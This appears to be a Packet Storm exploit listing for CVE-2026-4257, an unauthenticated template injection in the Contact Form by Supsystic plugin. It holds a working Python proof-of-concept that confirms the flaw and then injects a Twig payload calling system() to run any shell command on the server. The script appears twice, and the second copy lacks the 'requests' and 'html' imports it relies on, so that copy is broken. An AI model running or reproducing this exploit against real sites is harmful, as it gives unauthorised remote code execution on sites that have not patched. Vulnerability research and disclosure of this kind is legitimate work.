9.8
/ 10
CRITICAL
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Description
Contact Form by Supsystic versions 1.7.36 and below server-side template injection exploit that achieves remote code execution...
Basic Information
ID
PACKETSTORM:220753
Published
May 11, 2026 at 00:00
import argparse
import html
import re
import urllib.parse

import requests
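def check_ssti(url, field_name, *, session=None):
    """Probe *url* for template evaluation in the prefill parameter *field_name*.

    Sends an arithmetic expression through the ``cfsPreFill`` prefill path and
    reports whether the server rendered its result.

    Args:
        url: Page that embeds the vulnerable form. An existing query string is
            preserved (the probe parameters are appended with ``&``).
        field_name: Form field to inject into (e.g. ``first_name``).
        session: Optional object with a ``requests``-style ``get`` method
            (e.g. a ``requests.Session`` with proxies configured). Defaults to
            the ``requests`` module.

    Returns:
        True when the evaluated result appears in the response and the raw
        expression does not; False otherwise, including on transport errors.
    """
    http = requests if session is None else session
    print(f"[*] Testing SSTI on {url} with field {field_name}...")
    # Unusual operands: "49" (from 7*7) turns up in timestamps, IDs and CSS and
    # gives false positives; the product below is very unlikely to occur by
    # chance in a page.
    test_payload = "{{1337*7331}}"
    expected = str(1337 * 7331)  # "9801547"
    params = {"cfsPreFill": "1", field_name: test_payload}
    # Honour a query string the caller already put on the URL.
    sep = "&" if urllib.parse.urlsplit(url).query else "?"
    target_url = f"{url}{sep}{urllib.parse.urlencode(params)}"
    try:
        # verify=False: lab targets commonly use self-signed certificates. It
        # also means the probe can be intercepted on an untrusted network.
        response = http.get(target_url, verify=False, timeout=10)
    except requests.RequestException as e:
        print(f"[-] Error: {e}")
        return False
    body = response.text
    if expected in body and test_payload not in body:
        print(f"[+] SSTI confirmed! Found '{expected}' in response.")
        return True
    if test_payload in body:
        # The field echoed the expression verbatim: no template evaluation.
        print("[-] Payload reflected unevaluated; template injection not confirmed.")
    else:
        print(f"[-] SSTI test failed. '{expected}' not found in response.")
    return False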
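def trigger_rce(url, field_name, command, *, session=None):
    """Execute *command* on the target through the prefill template injection.

    The template registers ``system`` as an undefined-filter callback and then
    resolves *command* as a filter name, which calls ``system(command)``. The
    callback name and the command travel in the ``last_name`` and ``email``
    prefill values and are read back via ``forms.params.fields.1.value`` /
    ``fields.2.value``, so no quotes are needed inside the template.

    NOTE(review): the ``fields.1`` / ``fields.2`` indices assume the target
    form's second and third fields are ``last_name`` and ``email``; a form
    with another layout needs the indices and parameter names adjusted.

    Args:
        url: Page that embeds the vulnerable form. An existing query string is
            preserved.
        field_name: Form field the template is injected into.
        command: Shell command to run on the target.
        session: Optional object with a ``requests``-style ``get`` method.
            Defaults to the ``requests`` module.

    Returns:
        True when command output was recovered from the rendered field value;
        False otherwise (unevaluated reflection, no match, transport error).
    """
    http = requests if session is None else session
    print(f"[*] Triggering RCE: {command}")
    payload = (
        "{{_self.env.registerUndefinedFilterCallback(forms.params.fields.1.value)}}"
        "{{_self.env.getFilter(forms.params.fields.2.value)}}"
    )
    params = {
        "cfsPreFill": "1",
        field_name: payload,
        "last_name": "system",
        "email": command,
    }
    # Honour a query string the caller already put on the URL.
    sep = "&" if urllib.parse.urlsplit(url).query else "?"
    target_url = f"{url}{sep}{urllib.parse.urlencode(params)}"
    try:
        # verify=False: lab targets commonly use self-signed certificates. The
        # command output then travels in clear to anyone who can intercept it.
        response = http.get(target_url, verify=False, timeout=10)
    except requests.RequestException as e:
        print(f"[-] Error: {e}")
        return False
    print(f"[*] Response Status: {response.status_code}")
    # The rendered output is echoed back as the prefilled value of the injected
    # field. re.escape keeps regex metacharacters in the field name literal;
    # html.unescape restores characters the attribute encoded (&lt;, &amp;, ...).
    pattern = r'name="fields\[' + re.escape(field_name) + r'\]" value="([^"]+)"'
    match = re.search(pattern, response.text)
    if not match:
        print("[-] Could not find command output in response. Check the response body manually.")
        return False
    output = html.unescape(match.group(1))
    if "registerUndefinedFilterCallback" in output:
        # The field contains the raw template: it was reflected, not executed.
        print("[-] Payload reflected unevaluated; the template was not rendered.")
        return False
    print("[!] RCE SUCCESS! Output:")
    print("----------------------------------------")
    print(output)
    print("----------------------------------------")
    return True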
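if __name__ == "__main__":
    print("""
CVE-2026-4257
Contact Form by Supsystic <= 1.7.36 - Unauthenticated Server-Side Template Injection via Prefill Functionality
-------------------------------------------------
""")
    parser = argparse.ArgumentParser(
        description="PoC for CVE-2026-4257 (SSTI to RCE in Contact Form by Supsystic)",
        epilog="Run only against systems you are explicitly authorised to test.",
    )
    parser.add_argument("-u", "--url", required=True, help="URL of the page with the form")
    parser.add_argument("-f", "--field", required=True, help="Name of the form field (e.g., first_name)")
    parser.add_argument("-c", "--cmd", default="whoami", help="Command to execute")
    args = parser.parse_args()
    # The probe still gates the exploit; the exit status now reflects the
    # outcome so the PoC can be driven from scripts (it previously always
    # exited 0, even when nothing was confirmed).
    succeeded = check_ssti(args.url, args.field) and trigger_rce(args.url, args.field, args.cmd)
    raise SystemExit(0 if succeeded else 1)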
import argparse
import re
import urllib.parse
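def check_ssti(url, field_name, *, session=None):
    """Probe *url* for template evaluation in the prefill parameter *field_name*.

    Sends an arithmetic expression through the ``cfsPreFill`` prefill path and
    reports whether the server rendered its result.

    Args:
        url: Page that embeds the vulnerable form. An existing query string is
            preserved (the probe parameters are appended with ``&``).
        field_name: Form field to inject into (e.g. ``first_name``).
        session: Optional object with a ``requests``-style ``get`` method
            (e.g. a ``requests.Session`` with proxies configured). Defaults to
            the ``requests`` module.

    Returns:
        True when the evaluated result appears in the response and the raw
        expression does not; False otherwise, including on transport errors.
    """
    http = requests if session is None else session
    print(f"[*] Testing SSTI on {url} with field {field_name}...")
    # Unusual operands: "49" (from 7*7) turns up in timestamps, IDs and CSS and
    # gives false positives; the product below is very unlikely to occur by
    # chance in a page.
    test_payload = "{{1337*7331}}"
    expected = str(1337 * 7331)  # "9801547"
    params = {"cfsPreFill": "1", field_name: test_payload}
    # Honour a query string the caller already put on the URL.
    sep = "&" if urllib.parse.urlsplit(url).query else "?"
    target_url = f"{url}{sep}{urllib.parse.urlencode(params)}"
    try:
        # verify=False: lab targets commonly use self-signed certificates. It
        # also means the probe can be intercepted on an untrusted network.
        response = http.get(target_url, verify=False, timeout=10)
    except requests.RequestException as e:
        print(f"[-] Error: {e}")
        return False
    body = response.text
    if expected in body and test_payload not in body:
        print(f"[+] SSTI confirmed! Found '{expected}' in response.")
        return True
    if test_payload in body:
        # The field echoed the expression verbatim: no template evaluation.
        print("[-] Payload reflected unevaluated; template injection not confirmed.")
    else:
        print(f"[-] SSTI test failed. '{expected}' not found in response.")
    return False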
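def trigger_rce(url, field_name, command, *, session=None):
    """Execute *command* on the target through the prefill template injection.

    The template registers ``system`` as an undefined-filter callback and then
    resolves *command* as a filter name, which calls ``system(command)``. The
    callback name and the command travel in the ``last_name`` and ``email``
    prefill values and are read back via ``forms.params.fields.1.value`` /
    ``fields.2.value``, so no quotes are needed inside the template.

    NOTE(review): the ``fields.1`` / ``fields.2`` indices assume the target
    form's second and third fields are ``last_name`` and ``email``; a form
    with another layout needs the indices and parameter names adjusted.

    Args:
        url: Page that embeds the vulnerable form. An existing query string is
            preserved.
        field_name: Form field the template is injected into.
        command: Shell command to run on the target.
        session: Optional object with a ``requests``-style ``get`` method.
            Defaults to the ``requests`` module.

    Returns:
        True when command output was recovered from the rendered field value;
        False otherwise (unevaluated reflection, no match, transport error).
    """
    http = requests if session is None else session
    print(f"[*] Triggering RCE: {command}")
    payload = (
        "{{_self.env.registerUndefinedFilterCallback(forms.params.fields.1.value)}}"
        "{{_self.env.getFilter(forms.params.fields.2.value)}}"
    )
    params = {
        "cfsPreFill": "1",
        field_name: payload,
        "last_name": "system",
        "email": command,
    }
    # Honour a query string the caller already put on the URL.
    sep = "&" if urllib.parse.urlsplit(url).query else "?"
    target_url = f"{url}{sep}{urllib.parse.urlencode(params)}"
    try:
        # verify=False: lab targets commonly use self-signed certificates. The
        # command output then travels in clear to anyone who can intercept it.
        response = http.get(target_url, verify=False, timeout=10)
    except requests.RequestException as e:
        print(f"[-] Error: {e}")
        return False
    print(f"[*] Response Status: {response.status_code}")
    # The rendered output is echoed back as the prefilled value of the injected
    # field. re.escape keeps regex metacharacters in the field name literal;
    # html.unescape restores characters the attribute encoded (&lt;, &amp;, ...).
    pattern = r'name="fields\[' + re.escape(field_name) + r'\]" value="([^"]+)"'
    match = re.search(pattern, response.text)
    if not match:
        print("[-] Could not find command output in response. Check the response body manually.")
        return False
    output = html.unescape(match.group(1))
    if "registerUndefinedFilterCallback" in output:
        # The field contains the raw template: it was reflected, not executed.
        print("[-] Payload reflected unevaluated; the template was not rendered.")
        return False
    print("[!] RCE SUCCESS! Output:")
    print("----------------------------------------")
    print(output)
    print("----------------------------------------")
    return True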
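if __name__ == "__main__":
    print("""
CVE-2026-4257
Contact Form by Supsystic <= 1.7.36 - Unauthenticated Server-Side Template Injection via Prefill Functionality
-------------------------------------------------
""")
    parser = argparse.ArgumentParser(
        description="PoC for CVE-2026-4257 (SSTI to RCE in Contact Form by Supsystic)",
        epilog="Run only against systems you are explicitly authorised to test.",
    )
    parser.add_argument("-u", "--url", required=True, help="URL of the page with the form")
    parser.add_argument("-f", "--field", required=True, help="Name of the form field (e.g., first_name)")
    parser.add_argument("-c", "--cmd", default="whoami", help="Command to execute")
    args = parser.parse_args()
    # The probe still gates the exploit; the exit status now reflects the
    # outcome so the PoC can be driven from scripts (it previously always
    # exited 0, even when nothing was confirmed).
    succeeded = check_ssti(args.url, args.field) and trigger_rce(args.url, args.field, args.cmd)
    raise SystemExit(0 if succeeded else 1)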